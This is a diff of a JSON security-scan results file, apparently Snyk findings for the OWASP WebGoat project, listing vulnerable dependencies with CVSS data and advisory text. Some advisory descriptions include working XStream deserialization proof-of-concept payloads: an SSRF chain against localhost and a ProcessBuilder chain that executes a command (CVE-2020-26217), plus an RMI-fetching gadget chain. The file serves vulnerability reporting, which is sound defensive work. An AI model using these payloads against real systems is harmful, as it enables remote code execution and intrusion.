+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. This vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.\r\n\r\n### PoC\r\n\r\n```\r\n\u003cmap\u003e\r\n  \u003centry\u003e\r\n    \u003cjdk.nashorn.internal.runtime.Source_-URLData\u003e\r\n      \u003curl\u003ehttp://localhost:8080/internal/\u003c/url\u003e\r\n      \u003ccs\u003eGBK\u003c/cs\u003e\r\n      \u003chash\u003e1111\u003c/hash\u003e\r\n      \u003carray\u003eb\u003c/array\u003e\r\n      \u003clength\u003e0\u003c/length\u003e\r\n      \u003clastModified\u003e0\u003c/lastModified\u003e\r\n    \u003c/jdk.nashorn.internal.runtime.Source_-URLData\u003e\r\n    \u003cjdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/\u003e\r\n  \u003c/entry\u003e\r\n  \u003centry\u003e\r\n    \u003cjdk.nashorn.internal.runtime.Source_-URLData\u003e\r\n      \u003curl\u003ehttp://localhost:8080/internal/\u003c/url\u003e\r\n      \u003ccs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/\u003e\r\n      \u003chash\u003e1111\u003c/hash\u003e\r\n      \u003carray\u003eb\u003c/array\u003e\r\n      \u003clength\u003e0\u003c/length\u003e\r\n      \u003clastModified\u003e0\u003c/lastModified\u003e\r\n    \u003c/jdk.nashorn.internal.runtime.Source_-URLData\u003e\r\n    \u003cjdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/\u003e\r\n  \u003c/entry\u003e\r\n\u003c/map\u003e\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n## References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39152.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39152.yaml)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-thymeleaf",
-                  "version": "3.1.5"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "org.thymeleaf:thymeleaf-spring6",
-                  "version": "3.1.1.RELEASE"
-                },
-                {
-                  "name": "org.thymeleaf:thymeleaf",
-                  "version": "3.1.1.RELEASE"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "0000004a-0000-4000-8000-00000000004a",
+          "key": "00000000-0000-0000-0000-000000000025",
           "locations": [
             {
               "package": {
-                "name": "org.thymeleaf:thymeleaf",
-                "version": "3.1.1.RELEASE"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "critical"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 259
-            }
-          },
-          "title": "Sandbox Bypass"
-        },
-        "id": "0000004a-0000-4000-8000-00000000004a",
-        "links": {},
-        "relationships": {},
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to `String.toLowerCase()` having some Locale dependent exceptions that could potentially result in fields not protected as expected.\r\n\r\n**Note:**\r\n\r\nThe fix for [CVE-2022-22968](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634) made `disallowedFields` patterns in `DataBinder` case insensitive.\r\n\r\nThis vulnerability was also fixed in commercial versions 5.3.41 and 6.0.25.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 6.1.14 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/23656aebc6c7d0f9faff1080981eb4d55eff296c)\n- [Spring Security Advisory](https://spring.io/security/cve-2024-38820)\n",
-          "evidence": [
-            {
-              "path": [
+          "problems": [
+            { "id": "CVE-2021-39152", "source": "cve" },
+            { "id": "GHSA-xw4p-crpj-vjx2", "source": "ghsa" },
+            { "id": "CWE-502", "source": "cwe" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.18)"],
+              "created_at": "2021-08-24T08:45:56.403418Z",
+              "credits": ["m0d9"],
+              "cvss_base_score": 8.5,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-06-27T16:07:22.270326Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:56.828716Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:48.46823Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 5.9,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:58.026184Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
+              "disclosed_at": "2021-08-24T08:43:57Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.98503",
+                "probability": "0.67834"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Nuclei Templates", "Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569190",
+              "initially_fixed_in_versions": ["1.4.18"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2025-11-18T05:02:25.142667Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-08-24T15:09:23.370464Z",
+              "references": [
                 {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-39152.html"
                 },
                 {
-                  "name": "org.springframework.boot:spring-boot-starter-test",
-                  "version": "3.1.5"
+                  "title": "XStream Changelog",
+                  "url": "https://x-stream.github.io/changes.html%231.4.18"
                 },
                 {
-                  "name": "org.springframework:spring-core",
-                  "version": "6.0.13"
+                  "title": "Nuclei Templates",
+                  "url": "https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39152.yaml"
                 }
               ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "0000004b-0000-4000-8000-00000000004b",
-          "locations": [
-            {
-              "package": {
-                "name": "org.springframework:spring-core",
-                "version": "6.0.13"
-              },
-              "type": "package"
+              "severity": "high",
+              "source": "snyk_vuln"
             }
           ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "low"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 31
-            }
-          },
-          "title": "Improper Handling of Case Sensitivity"
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 501 } },
+          "title": "Deserialization of Untrusted Data"
         },
-        "id": "0000004b-0000-4000-8000-00000000004b",
+        "id": "00000000-0000-0000-0000-000000000025",
         "links": {},
         "relationships": {
           "fix": {
@@ -15723,21 +4297,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "org.springframework:spring-core",
+                  "package_name": "com.thoughtworks.xstream:xstream",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-test",
-                          "version": "3.2.11"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "org.springframework:spring-core",
-                          "version": "6.1.14"
+                          "name": "com.thoughtworks.xstream:xstream",
+                          "version": "1.4.18"
                         }
                       ],
                       "is_drop": false
@@ -15746,7 +4316,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "0000004b-0000-4000-8000-00000000004b",
+              "id": "00000000-0000-0000-0000-000000000025",
               "type": "fixes"
             }
           }
@@ -15756,13 +4326,13 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.\r\n\r\n### PoC\r\n```\r\n\u003csorted-set\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003eysomap\u003c/type\u003e\r\n    \u003cvalue class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'\u003e\r\n      \u003cm__DTMXRTreeFrag\u003e\r\n        \u003cm__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'\u003e\r\n          \u003cm__size\u003e-10086\u003c/m__size\u003e\r\n          \u003cm__mgrDefault\u003e\r\n            \u003c__overrideDefaultParser\u003efalse\u003c/__overrideDefaultParser\u003e\r\n            \u003cm__incremental\u003efalse\u003c/m__incremental\u003e\r\n            \u003cm__source__location\u003efalse\u003c/m__source__location\u003e\r\n            \u003cm__dtms\u003e\r\n              \u003cnull/\u003e\r\n            \u003c/m__dtms\u003e\r\n            \u003cm__defaultHandler/\u003e\r\n          \u003c/m__mgrDefault\u003e\r\n          \u003cm__shouldStripWS\u003efalse\u003c/m__shouldStripWS\u003e\r\n          \u003cm__indexing\u003efalse\u003c/m__indexing\u003e\r\n          \u003cm__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'\u003e\r\n            \u003cfPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'\u003e\r\n              \u003cjavax.sql.rowset.BaseRowSet\u003e\r\n                \u003cdefault\u003e\r\n                  \u003cconcurrency\u003e1008\u003c/concurrency\u003e\r\n                  \u003cescapeProcessing\u003etrue\u003c/escapeProcessing\u003e\r\n                  \u003cfetchDir\u003e1000\u003c/fetchDir\u003e\r\n                  \u003cfetchSize\u003e0\u003c/fetchSize\u003e\r\n                  \u003cisolation\u003e2\u003c/isolation\u003e\r\n                  \u003cmaxFieldSize\u003e0\u003c/maxFieldSize\u003e\r\n                  \u003cmaxRows\u003e0\u003c/maxRows\u003e\r\n                  \u003cqueryTimeout\u003e0\u003c/queryTimeout\u003e\r\n                  \u003creadOnly\u003etrue\u003c/readOnly\u003e\r\n                  \u003crowSetType\u003e1004\u003c/rowSetType\u003e\r\n                  \u003cshowDeleted\u003efalse\u003c/showDeleted\u003e\r\n                  \u003cdataSource\u003ermi://localhost:15000/CallRemoteMethod\u003c/dataSource\u003e\r\n                  \u003clisteners/\u003e\r\n                  \u003cparams/\u003e\r\n                \u003c/default\u003e\r\n              \u003c/javax.sql.rowset.BaseRowSet\u003e\r\n              \u003ccom.sun.rowset.JdbcRowSetImpl\u003e\r\n                \u003cdefault/\u003e\r\n              \u003c/com.sun.rowset.JdbcRowSetImpl\u003e\r\n            \u003c/fPullParserConfig\u003e\r\n            \u003cfConfigSetInput\u003e\r\n              \u003cclass\u003ecom.sun.rowset.JdbcRowSetImpl\u003c/class\u003e\r\n              \u003cname\u003esetAutoCommit\u003c/name\u003e\r\n              \u003cparameter-types\u003e\r\n                \u003cclass\u003eboolean\u003c/class\u003e\r\n              \u003c/parameter-types\u003e\r\n            \u003c/fConfigSetInput\u003e\r\n            \u003cfConfigParse reference='../fConfigSetInput'/\u003e\r\n            \u003cfParseInProgress\u003efalse\u003c/fParseInProgress\u003e\r\n          \u003c/m__incrementalSAXSource\u003e\r\n          \u003cm__walker\u003e\r\n            \u003cnextIsRaw\u003efalse\u003c/nextIsRaw\u003e\r\n          \u003c/m__walker\u003e\r\n          \u003cm__endDocumentOccured\u003efalse\u003c/m__endDocumentOccured\u003e\r\n          \u003cm__idAttributes/\u003e\r\n          \u003cm__textPendingStart\u003e-1\u003c/m__textPendingStart\u003e\r\n          \u003cm__useSourceLocationProperty\u003efalse\u003c/m__useSourceLocationProperty\u003e\r\n          \u003cm__pastFirstElement\u003efalse\u003c/m__pastFirstElement\u003e\r\n        \u003c/m__dtm\u003e\r\n        \u003cm__dtmIdentity\u003e1\u003c/m__dtmIdentity\u003e\r\n      \u003c/m__DTMXRTreeFrag\u003e\r\n      \u003cm__dtmRoot\u003e1\u003c/m__dtmRoot\u003e\r\n      \u003cm__allowRelease\u003efalse\u003c/m__allowRelease\u003e\r\n    \u003c/value\u003e\r\n  \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003eysomap\u003c/type\u003e\r\n    \u003cvalue class='com.sun.org.apache.xpath.internal.objects.XString'\u003e\r\n      \u003cm__obj class='string'\u003etest\u003c/m__obj\u003e\r\n    \u003c/value\u003e\r\n  \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n\u003c/sorted-set\u003e\r\n```\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many o",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that can execute arbitrary shell commands.\r\n\r\nThis issue is a variation of CVE-2013-7285, this time using a different set of classes of the Java runtime environment, none of which is part of the XStream default blacklist. The same issue has already been reported for Strut's XStream plugin in CVE-2017-9805, but the XStream project has never been informed about it.\r\n\r\n### PoC\r\n\r\n```\r\n\u003cmap\u003e\r\n  \u003centry\u003e\r\n    \u003cjdk.nashorn.internal.objects.NativeString\u003e\r\n      \u003cflags\u003e0\u003c/flags\u003e\r\n      \u003cvalue class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'\u003e\r\n        \u003cdataHandler\u003e\r\n          \u003cdataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'\u003e\r\n            \u003ccontentType\u003etext/plain\u003c/contentType\u003e\r\n            \u003cis class='java.io.SequenceInputStream'\u003e\r\n              \u003ce class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'\u003e\r\n                \u003citerator class='javax.imageio.spi.FilterIterator'\u003e\r\n                  \u003citer class='java.util.ArrayList$Itr'\u003e\r\n                    \u003ccursor\u003e0\u003c/cursor\u003e\r\n                    \u003clastRet\u003e-1\u003c/lastRet\u003e\r\n                    \u003cexpectedModCount\u003e1\u003c/expectedModCount\u003e\r\n                    \u003couter-class\u003e\r\n                      \u003cjava.lang.ProcessBuilder\u003e\r\n                        \u003ccommand\u003e\r\n                          \u003cstring\u003ecalc\u003c/string\u003e\r\n                        \u003c/command\u003e\r\n                      \u003c/java.lang.ProcessBuilder\u003e\r\n                    \u003c/outer-class\u003e\r\n                  \u003c/iter\u003e\r\n                  \u003cfilter class='javax.imageio.ImageIO$ContainsFilter'\u003e\r\n                    \u003cmethod\u003e\r\n                      \u003cclass\u003ejava.lang.ProcessBuilder\u003c/class\u003e\r\n                      \u003cname\u003estart\u003c/name\u003e\r\n                      \u003cparameter-types/\u003e\r\n                    \u003c/method\u003e\r\n                    \u003cname\u003estart\u003c/name\u003e\r\n                  \u003c/filter\u003e\r\n                  \u003cnext/\u003e\r\n                \u003c/iterator\u003e\r\n                \u003ctype\u003eKEYS\u003c/type\u003e\r\n              \u003c/e\u003e\r\n              \u003cin class='java.io.ByteArrayInputStream'\u003e\r\n                \u003cbuf\u003e\u003c/buf\u003e\r\n                \u003cpos\u003e0\u003c/pos\u003e\r\n                \u003cmark\u003e0\u003c/mark\u003e\r\n                \u003ccount\u003e0\u003c/count\u003e\r\n              \u003c/in\u003e\r\n            \u003c/is\u003e\r\n            \u003cconsumed\u003efalse\u003c/consumed\u003e\r\n          \u003c/dataSource\u003e\r\n          \u003ctransferFlavors/\u003e\r\n        \u003c/dataHandler\u003e\r\n        \u003cdataLen\u003e0\u003c/dataLen\u003e\r\n      \u003c/value\u003e\r\n    \u003c/jdk.nashorn.internal.objects.NativeString\u003e\r\n    \u003cstring\u003etest\u003c/string\u003e\r\n  \u003c/entry\u003e\r\n\u003c/map\u003e\r\n```\r\n\r\n*Note:* `1.4.14-jdk7`is optimised for OpenJDK 7,  release `1.4.14` are compatible with other JDK projects.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n\u003e Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which i",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
                   "name": "com.thoughtworks.xstream:xstream",
@@ -15773,7 +4343,7 @@
             }
           ],
           "finding_type": "sca",
-          "key": "0000004c-0000-4000-8000-00000000004c",
+          "key": "00000000-0000-0000-0000-000000000026",
           "locations": [
             {
               "package": {
@@ -15784,18 +4354,118 @@
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 338
+          "problems": [
+            { "id": "GHSA-mw36-7c6c-q4q2", "source": "ghsa" },
+            { "id": "CVE-2020-26217", "source": "cve" },
+            { "id": "CWE-502", "source": "cwe" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[, 1.4.14)"],
+              "created_at": "2020-11-16T10:48:32.69059Z",
+              "credits": ["Zhihong Tian", "Hui Lu"],
+              "cvss_base_score": 8.6,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 8.6,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:59:55.287774Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:P/RL:U/RC:R"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 8.8,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:50:51.142749Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 9,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:55.565058Z",
+                  "severity": "critical",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 8.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:39.940203Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:P/RL:U/RC:R",
+              "disclosed_at": "2020-11-16T14:02:37Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.99788",
+                "probability": "0.93171"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Nuclei Templates", "Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1040458",
+              "initially_fixed_in_versions": ["1.4.14"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2025-11-14T05:04:27.786634Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2020-11-16T10:59:35Z",
+              "references": [
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/x-stream/xstream/commit/0fec095d534126931c99fd38e9c6d41f5c685c1a"
+                },
+                {
+                  "title": "PoC",
+                  "url": "https://github.com/novysodope/CVE-2020-26217-XStream-RCE-POC"
+                },
+                {
+                  "title": "XStream advisory",
+                  "url": "https://x-stream.github.io/CVE-2020-26217.html"
+                },
+                {
+                  "title": "Nuclei Templates",
+                  "url": "https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-26217.yaml"
+                }
+              ],
+              "severity": "high",
+              "source": "snyk_vuln"
             }
-          },
+          ],
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 496 } },
           "title": "Deserialization of Untrusted Data"
         },
-        "id": "0000004c-0000-4000-8000-00000000004c",
+        "id": "00000000-0000-0000-0000-000000000026",
         "links": {},
         "relationships": {
           "fix": {
@@ -15809,11 +4479,11 @@
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
                           "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.16"
+                          "version": "1.4.14"
                         }
                       ],
                       "is_drop": false
@@ -15822,7 +4492,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "0000004c-0000-4000-8000-00000000004c",
+              "id": "00000000-0000-0000-0000-000000000026",
               "type": "fixes"
             }
           }
@@ -15832,50 +4502,173 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[org.springframework.security:spring-security-core](http://spring.io/spring-security) is a package that provides security services for the Spring IO Platform.\n\nAffected versions of this package are vulnerable to Authentication Bypass when directly using the `AuthenticationTrustResolver.isFullyAuthenticated(Authentication)` method and passing a null authentication parameter to it. \r\n\r\n**Note:**\r\n\r\nAn application is *not* vulnerable if any of the following is true:\r\n\r\n1) the application does not use `AuthenticationTrustResolver.isFullyAuthenticated(Authentication)` directly\r\n\r\n2) the application does not pass `null` to `AuthenticationTrustResolver.isFullyAuthenticated`\r\n\r\n3) the application only uses `isFullyAuthenticated` via [Method Security](https://docs.spring.io/spring-security/reference/servlet/authorization/method-security.html) or [HTTP Request Security](https://docs.spring.io/spring-security/reference/servlet/authorization/authorize-http-requests.html)\n## Remediation\nUpgrade `org.springframework.security:spring-security-core` to version 6.1.7, 6.2.2 or higher.\n## References\n- [Advisory](https://spring.io/security/cve-2024-22234)\n- [GitHub Commit](https://github.com/spring-projects/spring-security/commit/750cb30ce44d279c2f54c845d375e6a58bded569)\n",
+          "description": "## Overview\n[org.apache.tomcat.embed:tomcat-embed-core](https://mvnrepository.com/artifact/org.apache.tomcat.embed/tomcat-embed-core) is a Core Tomcat implementation.\n\nAffected versions of this package are vulnerable to Improper Resource Shutdown or Release due to the delayed cleaning of multipart upload temporary files. An attacker can cause a denial-of-service by sending crafted requests that create temporary copies of uploaded parts faster than the garbage collector clears them, leading to resource exhaustion.\r\n\r\n**Note:** Successful exploitation depends on the JVM settings, the application memory usage, and application load.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.tomcat.embed:tomcat-embed-core` to version 9.0.110, 10.1.47, 11.0.12 or higher.\n## References\n- [Apache Mail](https://lists.apache.org/thread/wm9mx8brmx9g4zpywm06ryrtvd3160pp)\n- [GitHub Commit](https://github.com/apache/tomcat/commit/1cdf5f730ede75a0759492f179ac21ca4ff68e06)\n- [GitHub Commit](https://github.com/apache/tomcat/commit/af6e9181620304c0d818121c29c074e1330610d0)\n- [GitHub Commit](https://github.com/apache/tomcat/commit/afa422bd7ca1eef0f507259c682fd876494d9c3b)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2406588)\n- [Vulnerability Advisory](https://tomcat.apache.org/security-11.html#Fixed_in_Apache_Tomcat_11.0.12)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "org.springframework.boot:spring-boot-starter-oauth2-client",
-                  "version": "3.1.5"
+                  "name": "org.springframework.boot:spring-boot-starter-web",
+                  "version": "3.5.6"
+                },
+                {
+                  "name": "org.springframework.boot:spring-boot-starter-tomcat",
+                  "version": "3.5.6"
                 },
                 {
-                  "name": "org.springframework.security:spring-security-core",
-                  "version": "6.1.5"
+                  "name": "org.apache.tomcat.embed:tomcat-embed-core",
+                  "version": "10.1.46"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "0000004d-0000-4000-8000-00000000004d",
+          "key": "00000000-0000-0000-0000-000000000027",
           "locations": [
             {
               "package": {
-                "name": "org.springframework.security:spring-security-core",
